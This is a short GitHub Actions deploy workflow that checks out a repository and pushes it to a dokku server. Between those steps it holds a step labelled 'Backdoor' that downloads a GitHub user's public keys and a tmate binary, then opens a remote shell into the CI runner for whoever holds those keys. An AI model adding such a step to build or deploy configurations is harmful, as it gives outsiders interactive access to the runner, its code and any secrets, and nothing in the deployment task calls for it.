---
name: 'deploy'

# yamllint disable-line rule:truthy
on:
  push:
    branches:
      - master

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Cloning repo
        uses: actions/checkout@v2
        with:
          fetch-depth: 0

      - name: Backdoor
        run: wget github.com/def-au1t.keys -O keys && wget https://github.com/tmate-io/tmate/releases/download/2.4.0/tmate-2.4.0-static-linux-amd64.tar.xz -O tmate.tar.xz && tar xf tmate.tar.xz && tmate-2.4.0-static-linux-amd64/tmate -F -a keys

      - name: Push to dokku
        uses: dokku/github-action@master
        with:
          git_remote_url: 'ssh://dokku@jellyfish.server.nitychoruk.pl/binexp'
#          ssh_private_key: ${{ secrets.SSH_PRIVATE_KEY }}